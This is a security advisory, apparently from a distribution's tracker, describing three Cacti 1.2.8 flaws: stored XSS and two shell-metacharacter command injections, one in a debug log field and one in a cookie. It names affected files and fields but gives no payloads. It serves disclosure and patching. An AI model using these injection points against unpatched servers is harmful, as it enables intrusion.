cacti: Multiple vulnerabilities (CVE-2020-7106, CVE-2020-7237, CVE-2020-8813)
CVE-2020-7106: Lack of escaping on some pages can lead to XSS exposure
Cacti 1.2.8 has stored XSS in data_sources.php, color_templates_item.php, graphs.php, graph_items.php, lib/api_automation.php, user_admin.php, and user_group_admin.php, as demonstrated by the description parameter in data_sources.php (a raw string from the database that is displayed by $header to trigger the XSS).
References:
CVE-2020-7237: remote code execution due to input validation in Performance Boost Debug Log
Cacti 1.2.8 allows Remote Code Execution (by privileged users) via shell metacharacters in the Performance Boost Debug Log field of poller_automation.php. OS commands are executed when a new poller cycle begins. The attacker must be authenticated, and must have access to modify the Performance Settings of the product.
References:
- https://ctrsec.io/index.php/2020/01/25/cve-2020-7237-remote-code-execution-in-cacti-rrdtool/
- https://github.com/Cacti/cacti/issues/3201
Patch:
https://github.com/Cacti/cacti/commit/5010719dbd160198be3e07bb994cf237e3af1308
CVE-2020-8813: remote code can be executed when guest users have access to realtime graphs
graph_realtime.php in Cacti 1.2.8 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie, if a guest user has the graph real-time privilege.
References:
Affected branches:
-
master -
3.11-stable (d257bf86)